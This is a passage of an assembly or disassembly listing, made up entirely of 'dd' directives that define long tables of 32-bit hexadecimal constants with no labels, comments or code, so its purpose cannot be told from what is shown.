		dd 0D7E8E18Dh, 0A092ED03h, 54F73388h, 3715F24Fh, 47314BECh
		dd 13204C8Ch, 0A55A04B2h, 23CE66F4h, 0E2F8408Ah, 1334C461h
		dd 0FDC71C33h, 75A24F37h, 235C646Bh, 5266E47h, 0EE49FD1Dh
		dd 0BCFAF63Ah, 47A82D81h, 0BA58E60Eh, 607724Ah,	0C54D9759h
		dd 0F671F6C6h, 0CB2A315Eh, 0C55E5D27h, 0D3D9FB77h, 5E3E2963h
		dd 0AFE8A2A9h, 23150416h, 151122E0h, 95989E3Ch,	0C220D8B1h
		dd 0BC0425EFh, 0EF8B570Dh, 6F9E2F6Ch, 0E2D3573Fh, 0D82CE27h
		dd 6EBD6805h, 5D6B4090h, 0B84C3994h, 136A4071h,	0B6DE8BA5h
		dd 0DFADCC2Bh, 58612D10h, 42FD9BECh, 0D36B68Ch,	31CD7340h
		dd 2F01098Ch, 95007507h, 894B3288h, 0F96D0E38h,	89C7FCEh
		dd 0F8048108h, 7613C4B7h, 770A57Ch, 11454E83h, 0B7DD9A70h
		dd 0C5C1FC21h, 89F34039h, 186AE7B7h, 2EB062CDh,	0FC781A59h
		dd 0D9D2F0AEh, 0B1B7CACDh, 6F03B541h, 6626EA85h, 110B7FFCh
		dd 85A4A133h, 872DC1FDh, 0DCE2A42Ah, 4617FFC5h,	0C78828F0h
		dd 72557B07h, 712D52CFh, 0EABA12B1h, 754B1440h,	6C55CD78h
		dd 1D406143h, 9A6BAC8h,	328E0DB7h, 5E31D134h, 0DED33475h
		dd 0F9145DC0h, 83BD212Ah, 90A580C5h, 104EBF10h,	9B75A6C6h
		dd 67511C42h, 9B02EC07h, 33E02828h, 7C178B43h, 1A2A522Ah
		dd 0BF34F68Fh, 0E561C627h
		dd 26E148F8h, 69424DDDh, 0FB983333h, 0DDEF613Bh, 0C41A9455h
		dd 9E8D64C1h, 0BB2C78ACh, 44EAD580h, 0A09A4E7Ch, 7A0FB4C5h
		dd 5E5DA287h, 1968F359h, 8ED1BD2h, 0A321C02Eh, 0DF92F04Ch
		dd 0B97022C1h, 2CE88E30h, 314638B8h, 182F711Ch,	9B8B628h
		dd 0F933A564h, 95EB4912h, 7B8AA613h, 29C3E085h,	836122A3h
		dd 0BE017D31h, 0ACD74A70h, 4388E30Bh, 567AF487h, 61D0455h
		dd 9F40A2F5h, 18BC0170h, 78BA1961h, 348E07E1h, 0E0E88DDAh
		dd 5D239F29h, 0A7513995h, 3D18568Ch, 1BECD399h,	0A5F64FF7h
		dd 11F50810h, 0EAB97183h, 1A1D0CA7h, 966CFC77h,	88EDBAD5h
		dd 0B8F677BFh, 68BB445h, 0ABA5245Eh, 0D457E0B8h, 7B46E8C9h
		dd 917400F3h, 3CAC4102h, 456F576Ch, 0C368B35Ah,	0C91400EBh
		dd 158C35A2h, 1A8C6256h, 8C411C34h, 8A96E871h, 600F4390h
		dd 0D0CD0C90h, 5B40B565h, 5BCAE54Bh, 0A5198A35h, 5738E264h
		dd 747FC7A3h, 4DFA13D0h, 0D4910CCCh, 0C5C728D7h, 64E442ACh
		dd 789C5DFAh, 0E8DA483Ah, 5C403289h, 482B4CAFh,	635C83FCh
		dd 2A182E1Ch, 0E0298596h, 0A6260E52h, 0A82F3B6Fh, 9D1A8D68h
		dd 929D5732h, 81682A8Bh, 403162EDh, 8A2C54EEh, 0F56BFFDDh
		dd 2C4E8CFh, 0D509986Eh, 0A41B2F3Fh, 6EA4577Fh,	0A8DC17F8h
		dd 83CDD737h, 9869ECA1h, 4515F62Fh, 0CD244EB4h,	0F96CA907h
		dd 0D2755D47h, 0F4A67095h, 0F36E5662h, 0D4062854h, 55EE5187h
		dd 705E6C34h, 0E821E0AFh, 1BD77074h, 0CF26AC4Ch, 0D9B80978h
		dd 7DC27F61h, 0F9230BADh, 3DB2A82Bh, 0B15C36BEh, 0C08BD928h
		dd 13D07ED1h, 0B5E4AAA5h, 245FFC22h, 4B40728Dh,	9B4D10B8h
		dd 0E26DE258h, 0A9091369h, 7AA4444Dh, 8B2EB572h, 7EB4F230h
		dd 46AA0A69h, 8E1C399Ah, 0A628EEC9h, 22E04CABh,	28ABEE6h
		dd 97EBE3D7h, 0C8C2E810h, 96AC6078h, 88479B07h,	0FB9CEDCh
		dd 0CC1C5CBAh, 0D445E890h, 1917FC8Dh, 656CDCF9h, 0AB15AF95h
		dd 5062D514h, 0E032FA5Eh, 55D656F7h, 4C008627h,	0B0956579h
		dd 0DA08682Eh, 513ABA7h, 73BCAFAAh, 902153B6h, 0EB5AABC7h
		dd 45A35AE4h, 1C543B00h, 0DEA25Dh, 0C4468F73h, 60E79099h
		dd 0E4A1A623h, 46B7A114h, 2C0A784Bh, 42B0FC52h,	0A6231484h
		dd 9493D024h, 8A02BC6h,	0E0354380h, 87366A36h, 0AE68C782h
		dd 30799AAAh, 0CE168B06h, 2394B8FEh, 893887DCh,	73CBD39h
		dd 0DDABF4D5h, 0BB902044h, 45905836h, 0D6620B14h, 0C21C7309h
		dd 86101346h, 25312874h, 0EB0FCA82h, 98C91456h,	55963951h
		dd 0AF40829Ah, 2CE5D04Eh, 1D8822CAh, 485BE334h,	689A4AE9h
		dd 7C5D1572h, 3A8D91B4h, 0B749668h, 0EA8D1CFFh,	9A0B62A6h
		dd 0B0355636h, 95669CF2h, 0F7AEFC84h, 0A0A0D49Dh, 43D97543h
		dd 6FD4757h, 762A01A4h,	0A2A6147Ch, 0F9835FFFh,	174E7DFDh
		dd 4CE00FAEh, 8849E543h, 60FC790Fh, 0D53604ACh,	0C4C81011h
		dd 3CC6089Ch, 0B720C2FFh, 7C11700Fh, 0A4BBFC1Bh, 0A506B860h
		dd 0E2463D82h, 7D284498h, 4AD1C383h, 692B485Bh,	0E7F722BEh
		dd 8CA9FE72h, 51575EBEh, 0C42C12C5h, 0AEFF7388h, 0FFC4B414h
		dd 0B8AB78C5h, 4A826B3Eh, 0C905A10Eh, 1FD29667h, 4917CFE2h
		dd 0FE093411h, 0FE2D8C64h, 95458DAAh, 0E156503Ah, 0D62B24Fh
		dd 0CDCED12Eh, 979496BDh, 4B778BFh, 2AF0914Bh, 69F2AD40h
		dd 0AFC0D506h, 0FE558A61h, 0B29C18A6h, 6A7E5BE4h, 614137C1h
		dd 49ECA6A1h, 0D4BAF6E8h, 173A8162h, 0EB97ABBCh, 2E1AE600h
		dd 8ED9F445h, 1281FD5Ah, 6872362Ah, 9B90F07Ah, 89507657h
		dd 5B7C7062h, 0E7B54272h, 0DE19F885h, 0D602088Dh, 32896A86h
		dd 801F101Bh, 3AB31959h, 46F81B54h, 0ABA3BE4h, 0C6A8123Eh
		dd 6DC8283h, 0E10AB459h, 7F137E26h, 2E26C26Eh, 0ABC7218Fh
		dd 123B2F2Ah, 0F597F547h, 957946E8h, 57957CF9h,	6531FE98h
		dd 0AB7B7345h, 842FAABAh, 2CE394D8h, 0DAA69374h, 0B3AD18EAh
		dd 18DADE83h, 549A6DA4h, 2B07491Ch, 0CBA915E4h,	0D55BBA49h
		dd 69623C48h, 0B9414C55h, 0EEF075E7h, 62E78AF8h, 8697225Eh
		dd 82EB80A7h, 644318BFh, 8E720B55h, 0E909A101h,	0F89540B2h
		dd 0F7EC576Ah, 2AACCA05h, 786AE2F8h, 6FEB7872h,	0D839E8F9h
		dd 9380A09h, 0A8F6E7D6h, 0B2207D2Bh, 2B6834C9h,	0DC195389h
		dd 0C8FED043h, 0B86A2602h, 328D0FC4h, 24BE5D34h, 6DAB8337h
		dd 1C367496h, 0D507ED4Eh, 0D4A4156Eh, 0BDB1AFE2h, 2AAE76D8h
		dd 0F2F16F81h, 0AAA17A7Ch, 0D79F13C1h, 0D20C185Dh, 0E5650E9Bh
		dd 3027BEDFh, 908C542Dh, 2AE2413h, 0B21DBE77h, 0ABAABEAEh
		dd 0D362090Ah, 2BF2F5C9h, 8DE90CF3h, 0CD3858EAh, 0FA4E08FFh
		dd 5D5EA15Ch, 1E7F030Bh, 59C83BDh, 5AD9F73Eh, 45D43245h
		dd 0AAE92FBEh, 0B1EEAA23h, 7636CD2Bh, 0AD39B287h, 0B1E968D5h
		dd 0DBAD8F2Bh, 0ED8CC7F5h, 0A2995187h, 4E4DFC3Bh, 1B540F57h
		dd 323D75h, 0C0B29D7h, 4096BBFCh, 0AD5ACB1h, 6A8BABA8h
		dd 0D5D097D2h, 0A3C89D7Ch, 5A7C3682h, 0ED5BB3C8h, 57C05551h
		dd 4AE51B9Dh, 0F1CD75A1h, 9C579ACEh, 7C918D6Dh,	8D5D7198h
		dd 45AA4C67h, 6764A3E8h, 0CB2222FAh, 3ED5D9BCh,	802A4EE8h
		dd 15071241h, 28AA8A57h, 0ACDA73A4h, 8C02D089h,	758785EAh
		dd 0BF7EAA23h, 0EC45F892h, 3C8140DDh, 0D8CC75Bh, 0B7225796h
		dd 0CAB07E20h, 0AC006A60h, 4E56A903h, 1187A014h, 5A15ED0Eh
		dd 5CC2E50Dh, 0C9E97052h, 4D972B8Ah, 0B193A351h, 8D066FD9h
		dd 20EBAEAFh, 0D0058D5Fh, 0B63BAC92h, 0E9150A2Ch, 0FEB018D5h
		dd 0E4A57E4h, 0E85806CEh, 0ED0064Bh, 9E260C0Fh,	832B51FFh
		dd 12802048h, 44681401h, 8880F0DFh, 5152E35h, 643393Ch
		dd 0DA244C0h, 1E0B8313h, 968F010Fh, 62E4C01h, 5A108889h
		dd 0F2621A10h, 42B9E6B5h, 0D924903Eh, 0CC0323Fh, 846DAEA1h
		dd 0E381FE88h, 0F04CC963h, 0AA55149Dh, 0A6C27A9Ah, 4BABE1ECh
		dd 15FF0A50h, 25D6A022h, 9C1F4AEFh, 0E73E553Fh,	822F7C3Ch
		dd 8C80D3C9h, 0B0EAF62Dh, 170ED117h, 0D0206FC3h, 21F8A4AEh
		dd 32D4127Fh, 0C98E5E98h, 89AAF1B1h, 55BF2E27h,	0F82EFD0Bh
		dd 6E108031h, 0B6A1049Fh, 0FEA03C2Fh, 195974E0h, 65B094ACh
		dd 174BFDD9h, 2908AD6Bh, 10243B3Bh, 16026B80h, 0C5F20AC5h
		dd 0BC6DE719h, 4FBBA7Eh, 0D7373205h, 0F4269890h, 6818144Fh
		dd 0D71CEB23h, 0BC0CE467h, 0CDC2C6D2h, 3AC34D9h, 0B304A871h
		dd 6A9B1912h, 0B0247729h, 194F5395h, 0B4BA1FC8h, 5006A626h
		dd 8573B058h, 48D76A50h, 96AE7069h, 78DA459Dh, 3559FE0Eh
		dd 195A36FAh, 24F08F12h, 406CC020h, 86527F70h, 0BEF55830h
		dd 8B2AEBD3h, 8636DA05h, 6105241Fh, 6BB277Dh, 0F0C20493h
		dd 0C5AD574Ah, 15C10B05h, 1BE40288h, 2F97FEE4h,	7DFA68BEh
		dd 0A358D3F7h, 1C12D21Bh, 0A55254C8h, 8D63EA69h, 6363EBh
		dd 7603697Eh, 1040DA35h, 0AC0A7419h, 0D465046Dh, 0C2149A7h
		dd 40FE852Ch, 615D0802h, 0DEB23BB0h, 1DA832ABh,	560AEB0Eh
		dd 0E18D7E11h, 4BD68223h, 14AF8674h, 5C9A6089h,	0A94E00C0h
		dd 0EB600193h, 2B62C122h, 0FFF7C528h, 68C829B0h, 0E4B80544h
		dd 0F10018DCh, 96280BE9h, 1B038728h, 8C81A8CAh,	0CD44AB09h
		dd 13189A8Bh, 9786A82h,	0F3133129h, 20E828Ah, 0D46F70C8h
		dd 0D09E91Bh, 853008D7h, 3A247D11h, 923E8831h, 5C6EC1F4h
		dd 0B3A11FF5h, 158B3E60h, 50A459B5h, 0EB9BEEC3h, 0B0EB36A0h
		dd 0F6A854D6h, 0E18711CFh
		dd 10C14783h, 0EAA7C0E9h, 0F598606Bh, 0F65C51FFh, 840800Ch
		dd 0E811A135h, 307A1FE2h, 0DB11061Dh, 0FF524C40h, 16196164h
		dd 0BCAD286Ch, 0A3293980h, 259C83Bh, 0E97404FFh, 6E05ABC3h
		dd 60B6596Ah, 14449708h, 27650278h, 1C961772h, 0C556B970h
		dd 7C85E50Fh, 8FB2EEA5h, 91148F48h, 14D3A25Ah, 0A5785DEBh
		dd 5F3BA0BBh, 95DA2181h, 0B6C28285h, 0E230983h,	1126228Eh
		dd 133D8808h, 0ADD7418Bh, 9E1E6A34h, 0A9D1EBDCh, 675685C4h
		dd 1759E00Dh, 8110E7BEh, 7E4A60Fh, 9DF27D2Bh, 824BA038h
		dd 3AE0D14Ah, 0C1B9E942h, 6C392D78h, 0BFB400CCh, 18766896h
		dd 4E115206h, 1CD78E20h, 3134B542h, 42D67836h, 89646337h
		dd 0CE4BA822h, 15AA8102h, 0CBA42B1h, 0E05230D5h, 0DA7AC49Fh
		dd 3A70AEDDh, 67CEF378h, 5E0A8462h, 0B100E138h,	22EA31D8h
		dd 0DD8CC182h, 2BF681C3h, 0E49E61Ah, 66204571h,	86AA9F6Dh
		dd 0E7179702h, 9773D647h, 9304C3B4h, 8A2F1130h,	568145BFh
		dd 0C57FE2B4h, 55D70800h, 662FA40Ah, 3A70E8D0h,	6817F6F6h
		dd 0C4467CEAh, 0E8299861h, 5B278BE7h, 0E5C87F2Dh, 9277C4C6h
		dd 0D57FDC01h, 1ACCFAC4h, 9FC1977Ah, 28D244AFh,	707F4C4h
		dd 7FCA0A55h, 8ADF48FCh, 21FCE23Dh, 4C401637h, 0EEF501DCh
		dd 2FF0087Dh, 84100140h, 0D1EF03EAh, 0C01ADE03h, 8A93108Bh
		dd 0E2C4C146h, 160F75E5h, 163651D4h, 7D9AAA85h,	741A9F0Ch
		dd 2974828Dh, 0B267A501h, 0D4E91A5Ch, 0B4DDA88Ah, 50CABC32h
		dd 0DC1C8AA3h, 4A9B723Fh, 3B752701h, 6F10114Eh,	59C981C2h
		dd 0F7E94598h, 651713D5h, 1D454856h, 3D94F115h,	9F16CC86h
		dd 0E8A7CBA9h, 517B7DCFh, 0F07D5E57h, 93EF388Bh, 9FFC4872h
		dd 0BE14A62Eh, 0C71BC1F9h, 0B48999DFh, 88827C9Ch, 0FC71F04h
		dd 0E7EDB5F9h, 14CA5541h, 0C0FBC35Fh, 8A632812h, 4BCE2EACh
		dd 0F304CA81h, 0CACFE707h, 0F176A4E0h, 9456C293h, 175F8328h
		dd 0CA424087h, 3058824Eh, 234E2EB4h, 8C6D7B73h,	0F6EA325Fh
		dd 24C93202h, 1F076411h, 0AA6791FCh, 7079C0C3h,	2738320Fh
		dd 0CB4F2Eh, 45E49026h,	4495FA81h, 23B80F1Ah, 0F34BF3A0h
		dd 2160AA8Ah, 2CE09A57h, 94FC2879h, 0F890FFE0h,	0BDD71959h
		dd 0FA1D4C4Fh, 0D08857D0h, 82048E7Eh, 30202A0Eh, 4F270480h
		dd 0CC14B3h, 2EB545CDh,	320EEC0Fh, 134B7C55h, 0D423F211h
		dd 44E7FE91h, 0DA23881Fh, 9076A698h, 6A655A00h,	8E7C400Eh
		dd 0AB0294F7h, 9D10C235h, 9A8CEB9Ch, 915C5485h,	36D00DC9h
		dd 0C01248E8h, 63475DEDh, 880A31B4h, 8F6C6840h,	0D6C79F85h
		dd 387EB681h, 0A242431Ah, 9291365Eh, 4455761h, 2B9369A7h
		dd 555C2C37h, 129D32AAh, 0A2C01FF4h, 0A2DA832Ah, 0FB2A0D00h
		dd 9022695Eh, 5D4D8EA2h, 0CEAA0CAh, 0B28AB0FCh,	0F9160ED3h
		dd 7483C9B7h, 0A439E725h, 6A7228E0h, 46D75935h,	51C13419h
		dd 8D2861ACh, 0ACAA2EEAh, 14405CD0h, 0E2EC364Dh, 0C506D78Ah
		dd 0F12FE2B2h, 2D0A3619h, 60637951h, 56D65ED4h,	0E8324512h
		dd 1448C515h, 0EC7DA4CEh, 0BF46EA8Ah, 4E51139Dh, 90F4F7A2h
		dd 1877B9C8h, 2BAD469Ah, 9571AF2Ah, 0A8824E47h,	8EC7C481h
		dd 0FF45463Fh, 7DA028B6h, 0B1CD342Eh, 72596A2Ah, 94F00579h
		dd 26C5548Bh, 9AD3FC17h, 0AD57A70Ah, 0CC73A482h, 3F71BEC2h
		dd 0F63DBFFDh, 9D6265D6h, 333F70D5h, 2E509CA3h,	0BC93B0A8h
		dd 0D1A5D0D7h, 0C9DCB2EAh, 0A7F4DB1h, 7BAC8C12h, 0C38AA17Dh
		dd 3F402B07h, 45FE1EECh, 0A6E2972Fh, 0CCC4E96Fh, 946AE3A2h
		dd 0E1718A9Dh, 3077DDD2h, 416CF5C3h, 0D2E5B384h, 3F31443h
		dd 0A12CF001h, 6403163Ah, 0EFD538CCh, 26EE8183h, 927EF64Ah
		dd 93660A40h, 305A0EB0h, 544C70D5h, 8096E1D6h, 0C1CE1BB4h
		dd 4F29A196h, 52B03FF7h, 40FB8EBh, 0E7021C14h, 378CD7FDh
		dd 8C5FE914h, 24745081h, 4E7D1445h, 0AE68D690h,	0E369D652h
		dd 9396202Fh, 1DFF0A2Dh, 0B323A852h, 0D6FA55CAh, 0BF3B8405h
		dd 9F0A209Eh, 2099CD53h, 7CE7D4C1h, 6590FFE4h, 520AD2CCh
		dd 0A1C9556Dh, 4A24FAA1h, 4513A3E1h, 0A95A11B5h, 0F15AC2B0h
		dd 42FCF791h, 0EB927782h, 0FEBFB40Ch, 0C001C611h, 8E274A52h
		dd 0A5F6442Bh, 0E7B80B44h, 31B74D8Bh, 0CE534F7Fh, 0C91DC9C2h
		dd 4430731Eh, 0E87D7311h, 0C1E023Fh, 3243D666h,	0CB1CC5CFh
		dd 9CC60BF5h, 0F5823C18h, 1909621Ah, 0BAC2EE43h, 2B6440C9h
		dd 0BC4C254h, 1A102B2Eh, 2CE279F8h, 0E2848BDh, 2F342C4Ah
		dd 5E31123Ch, 3A94018Dh, 0D45145A6h, 0EB4C8042h, 69860060h
		dd 0D7D97579h, 0D02885A2h, 38681A07h, 33B5B3CBh, 0FE1F7BE1h
		dd 48BCA8DCh, 6C35BE35h, 0A1375F04h, 0EB1B69F5h, 2D3FB746h
		dd 6F74BCC4h, 0F6389BE4h, 242F266Eh, 274CEBC1h,	0E701130Ah
		dd 0AFC088B9h, 0CD68E14Bh, 4E6AC745h, 90E01366h, 0DE418A21h
		dd 723588C6h, 0AE31027Ch, 0C2603B8Eh, 29164A37h, 0B2B07178h
		dd 308C011Dh, 22DC1271h, 0F85A69A8h, 55726968h,	682C6804h
		dd 43AF31h, 0AFC0285Bh,	0A64C1A94h, 0E2AAFE1h, 462D5F34h
		dd 7206165Fh, 98AD4863h, 0F2B00FC6h, 0CA1BA63Bh, 5680AB96h
		dd 41FD4567h, 3AD71C4h,	0C1843049h, 0AAE6CC3Eh,	0F90AD455h
		dd 1226E0CEh, 2917187h,	75A5478Eh, 7486880Bh, 903EEE21h
		dd 1938BA3Dh, 0B63C7CCEh, 0B1065769h, 0A8946975h, 0BBC10E0h
		dd 63EF7DA8h, 0B8660E61h, 0AFDF6A56h, 1B540FFAh, 55D894C3h
		dd 6122B1Ch, 3FE5AC2Ah,	8D3D02B5h, 0C3D8D2BDh, 81B56D07h
		dd 40DC68A2h, 4EDD70BCh, 7AE20C1Dh, 0B4E122C6h,	0BD0133BAh
		dd 0BFD37803h, 28D0BE16h, 41E30516h, 5345F18Fh,	0AD2EB688h
		dd 0AE46D742h, 197DCD0Eh, 0BD421DC3h, 0F8CD1C66h, 3033297Ah
		dd 0CEDB134Ah, 0CAB09B1Dh, 6771E0BAh, 0BA4873D9h, 441A79FCh
		dd 0C0426D00h, 0F6A28488h, 84A2D1D6h, 0A5FF0FC2h, 3028D47Ah
		dd 64DB8A83h, 64554203h, 6D104B26h, 4CAA4D4Eh, 0D527CBA4h
		dd 2D9A83F9h, 0C531C806h, 634E204Ah, 91A73488h,	0CF876A55h
		dd 1CB8498Ah, 0EE185FD2h, 0AB900C1Dh, 32955E1Eh, 2A9DA002h
		dd 810BCBDDh, 0BD85982Ah, 4BF99A24h, 680D3F3Fh,	0D460D6CAh
		dd 7055CB14h, 12E69D7Ah, 92058C72h, 0CE78842Fh,	0BA4E8E6h
		dd 1ADCB514h, 0D553357Fh, 4054F5F8h, 0AC6834D4h, 0C8A3570Ah
		dd 54E579Fh, 0FC1F0AE1h, 39D18460h, 502CEC4Ch, 840A3813h
		dd 5FEDF787h, 245CDA9h,	0BAB7800Dh, 266A73A4h, 3BF86A6Dh
		dd 8C19F659h, 0BAC35D21h, 0D5095010h, 0EAA555F8h, 6740423Dh
		dd 34BF6CEEh, 880D59ABh, 0B714DE31h, 4FB15DF2h,	3087830Ah
		dd 6257B481h, 0CEFF0CC4h, 85FAF8A4h, 0A8316F9Ch, 555B3B57h
		dd 53F9D107h, 8E84F86Ch, 5ADAEBA6h, 5CB88070h, 4CDD3979h
		dd 29FE0CFEh, 0E0BE2360h, 3F3E53FEh, 1C13A6D3h,	9E93D058h
		dd 29042AFAh, 2296EA72h, 4C95905Dh, 48FCA815h, 0B024444Bh
		dd 5251246Fh, 534AEB54h, 0FAE2D9C5h, 0C55D6209h, 419BCE83h
		dd 0DF567D6Ah, 2A13DC9Ch, 10E86F21h, 0C8A977AEh, 0BB695E2Eh
		dd 0BBF5FADh, 67FE1F6Ah, 573F1290h, 25E26216h, 88E2F498h
		dd 0A02A178Bh, 430B2046h, 3E16A969h, 0FC36F8Bh,	0C241A3EAh
		dd 0CA2A42E8h, 14F8B865h, 6BD0B8E1h, 0F87F7AE2h, 8933A2ECh
		dd 1CF8D752h, 0ABF69E5Ch, 0F3ABB890h, 0DA8EB97Fh, 30998CA7h
		dd 0BA4D2B95h, 0F17427D9h, 96233077h, 20DEBACBh, 2A079463h
		dd 142B96Eh, 0B06AFFA6h
		dd 66EBFBCDh, 0C18D50C3h, 4BB21352h, 0D84FCE25h, 5FF251CFh
		dd 0F4EBD938h, 82D068BFh, 25E2CAE9h, 7D1C8FF2h,	9104048Fh
		dd 8CEA5C8Bh, 0EADFDA99h, 0C6F6A62Ch, 3FFD02C7h, 6711805h
		dd 0E37DAC20h, 97D7B4DCh, 368E1D02h, 6FE2DCB6h,	0FE00FC97h
		dd 6675A2h, 0E2AE24E2h,	67A0C10Dh, 0EA998148h, 934C4E5Ah
		dd 50BEAE45h, 911105F7h, 0D3784B26h, 0A0A465ECh, 9F16C0F3h
		dd 85CD30FBh, 0D594917Ch, 0AB66EF3Dh, 0E8BEBA3h, 45009D06h
		dd 2EA92128h, 100F85F7h, 0D065A233h, 0AF1FB96Eh, 61441446h
		dd 0C9B37801h, 29FFBAAEh, 244922B3h, 19C29804h,	87151EEFh
		dd 0F24D4680h, 0E4E61399h, 610D749Bh, 0ABE70067h, 7C1D6622h
		dd 14B2060Fh, 0A389DE6Dh, 8CF0398Bh, 2B85B83Fh,	4F2B81CEh
		dd 8A9F2C90h, 804C1778h, 5FE21A5h, 499A07A3h, 2008F076h
		dd 29BE1598h, 611D2BB3h, 4083C270h, 4AC577Ah, 7914B409h
		dd 0F0F7CED7h, 0FFC9C643h, 2ED4B0D9h, 0B81730A5h, 2146022Ah
		dd 28D20B66h, 4EEE06E0h, 0AC84DE8Fh, 0ABF029CFh, 89DC48A0h
		dd 585A293Dh, 911EC052h, 2B74B65Ah, 64E82D65h, 0D20F8902h
		dd 6CBCA6BAh, 7860A1D0h, 6AFAC311h, 345D924Eh, 0DC8991Eh
		dd 6A3E0C0Ah, 15A16821h, 0CA18A68Ch, 0C564388Ch, 31050FD2h
		dd 5DFF81DDh, 8313376Ch, 0DF8CF8AEh, 0CDD74E98h, 0D0BB1837h
		dd 38A032DBh, 1E8E52ACh, 8908B90Ah, 3C705636h, 50F0581Ch
		dd 854715DAh, 21A0118h,	5FF6536Fh, 268CF463h, 9BA53F8Dh
		dd 2D056E94h, 5B151805h, 2D77A708h, 0BCC1F168h,	0B5135198h
		dd 27769A9Bh, 42861624h, 30ACBACh, 76A4097Bh, 7AC42D4Dh
		dd 6A8A1A9Ch, 0A35DD44Ch, 4DAE6AF6h, 1B8039Eh, 0BC46B17Ch
		dd 0E4A40CD0h, 52798617h, 0F9921724h, 0FF43306h, 8B593595h
		dd 20C38318h, 0D20414B9h, 2A569A66h, 0C8971FE8h, 0C897F43Eh
		dd 0C895543Dh, 0C937843Ch, 57DA843Bh, 3CE1918Ch, 0DDBF7453h
		dd 0F1DC155Bh, 7CEBBAF5h, 9C5DC551h, 8DBA2A11h,	704537A1h
		dd 4191F31Ch, 124C7EB0h, 0AEA60D4Eh, 79333C3h, 5D42027Eh
		dd 80C81F72h, 0D0D504F5h, 0E95A1E54h, 0A41C9142h, 94D0531Ch
		dd 428ADBh, 82452805h, 82BF1082h, 7A2E3E08h, 48AC121Ch
		dd 0ADE02029h, 0B218D737h, 0B370B9F6h, 339DDAEFh, 4CC2E58Ch
		dd 1D5FC514h, 0C1068E07h, 99D19CD3h, 0DF730951h, 0ADCFDE6Ch
		dd 50F1DE8Bh, 0FD7653A8h, 83A18C5Fh, 0C834C046h, 5428B94Ch
		dd 57DEB1E0h, 0BD812EB0h, 87D42794h, 0C345FAFBh, 1A64EE14h
		dd 0D053747Dh, 709DA40h, 2756307Fh, 306044E5h, 14CD5B00h
		dd 0AA493790h, 632E2D79h, 0AA6ACE0Bh, 82186819h, 256BECAFh
		dd 70B1641h, 0AA1114CFh, 49E12836h, 3FF1D4BAh, 5975FB7Ah
		dd 5DC7751Ah, 0A15C5B1h, 4B5A414Ah, 154DE17Fh, 0AE1BE916h
		dd 8C408227h, 0B97D8A09h, 0E88D402Ah, 941C0558h, 7C65562Ch
		dd 0A4B94F67h, 0AE7097ABh, 0B6FE7D11h, 0AABBA40Bh, 0C3F11BAAh
		dd 0AF85331Dh, 34E31CCCh, 740D1FCh, 246BCE1Bh, 0D8AD8F43h
		dd 0A6A3BC55h, 430C2B20h, 5D116170h, 0B19EA3DBh, 1359ACA6h
		dd 0B40AB810h, 1AB4CD63h, 284BED47h, 0F80ADD15h, 61797168h
		dd 0F61B2C1Eh, 12D5E0E3h, 0C0D8EC5h, 0A2034384h, 1EBAD292h
		dd 6EB7693Ah, 6D09062Eh, 97F7A336h, 15F6B62Eh, 5E1C5606h
		dd 0CC306844h, 9050A169h, 0C6E2FE5Fh, 6C822101h, 96D3E5A3h
		dd 3BDA97D0h, 9128A149h, 6860443Fh, 813ABFE2h, 4F21EADCh
		dd 0A4CBBC10h, 0D80F0123h, 0B51D5D61h, 37BDD59Ch, 0C8124CE8h
		dd 6E1B73E9h, 0E9475FA0h, 0ECB5181Bh, 83BC47C8h, 551D733h
		dd 5E956AECh, 0AA0181B5h, 0BA42A08Ah, 6FD309ACh, 0EC3B9BB6h
		dd 16F3318Bh, 87E9F24Ch, 0C013FB2h, 0C0180806h,	7F299517h
		dd 1684C22Dh, 0C0D7EC62h, 0E6010063h, 5302B01Ah, 99FB4301h
		dd 0B62E09A9h, 31BE99Ch, 3CEBFA6Fh, 0D235B44Eh,	0C27190D5h
		dd 0A984390Ah, 1E2850EAh, 7DF3C691h, 19584B01h,	0F4D0B551h
		dd 0B96D9E61h, 0A18B2793h, 2E5FD616h, 9B706960h, 0EB4D9DCAh
		dd 94BC5A2Bh, 0B90AD084h, 0C305369Eh, 7F56C8E5h, 278DB3C8h
		dd 0F4563B6Ch, 0E62B47F4h, 0D24E8A6Ch, 0CEB566A6h, 9044547h
		dd 2C50EFE2h, 2A3C2725h, 89823041h, 250E62DCh, 6F1CC5A7h
		dd 0C1232409h, 0C0D98921h, 93071052h, 82E90892h, 4A02D8F4h
		dd 6871501h, 0F0F5C6C9h, 87B3EFDBh, 0AAC116h, 74812622h
		dd 9F5A05Dh, 7C048164h,	89DFB300h, 14BE13D1h, 5CE15AFFh
		dd 0C60F2CCBh, 0B769DF7Eh, 6CB6A444h, 1534AD73h, 0FF173477h
		dd 0EDBADF62h, 521250B8h, 9115F14Ch, 0D7FA4C2h,	102CFCABh
		dd 4C5FEBBDh, 0C3BA5285h, 73881E17h, 0B573C101h, 0DCFF471Bh
		dd 0F9E8627Bh, 81A9D355h, 0A2F6BFC1h, 2509D9A8h, 0DFF33335h
		dd 19818ABAh, 0E541529Ch, 2E044FCCh, 0F8495330h, 110EFB41h
		dd 0F99840E3h, 754AA77Ah, 61EEDC28h, 0D3CEF8D4h, 8EE52787h
		dd 0AA8F5598h, 9D80D298h, 3141762Fh, 0E1B03F30h, 404E14CEh
		dd 732A0CE3h, 1260503Dh, 4EF94D98h, 0A4ADC689h,	0A3F8D75Fh
		dd 0DCB44FC3h, 2CB0F5C7h, 0C04E4922h, 20A15149h, 481614C4h
		dd 0BEEC1DF5h, 3CFD1B84h, 0C641752h, 0E6A2AD07h, 79F496E5h
		dd 1529599Dh, 25A81185h, 566E6FAEh, 46E60A2h, 0CF67106Eh
		dd 175D1693h, 0CA761113h, 0F292E04Ah, 211A0030h, 7A0E57FEh
		dd 54D5EEDDh, 33B1AD32h, 0F6BAD121h, 0D80585F3h, 0DE429558h
		dd 28622294h, 501024F0h, 0C3A3B723h, 0A8981DABh, 16A37040h
		dd 0C1F5038Bh, 2A2D419Bh, 9F63EC5Dh, 34DBB05Fh,	682FF1ECh
		dd 6493C19Bh, 1C175057h, 85180BECh, 8A968A0Ch, 0E720B137h
		dd 8D0CBAC7h, 92249174h, 3E25E161h, 76161243h, 0B8999985h
		dd 315C383Eh, 1BAAAA6Fh, 4F2B8914h, 15F20CD3h, 4D1A2B92h
		dd 204D2AD0h, 0A946C321h, 77D8B58Ah, 0A07109C1h, 237109ACh
		dd 0E138596Eh, 1E758A81h, 6E310B2Ch, 0A62B2AEAh, 0DD9EB38Eh
		dd 0A123A0B2h, 0DD80F22Eh, 0FB2F8FACh, 0E750BB9Dh, 0E8916AE8h
		dd 0EAD8531Ah, 0F8F52EB6h, 6FE01E2Ah, 0E1407278h, 0B780985Ah
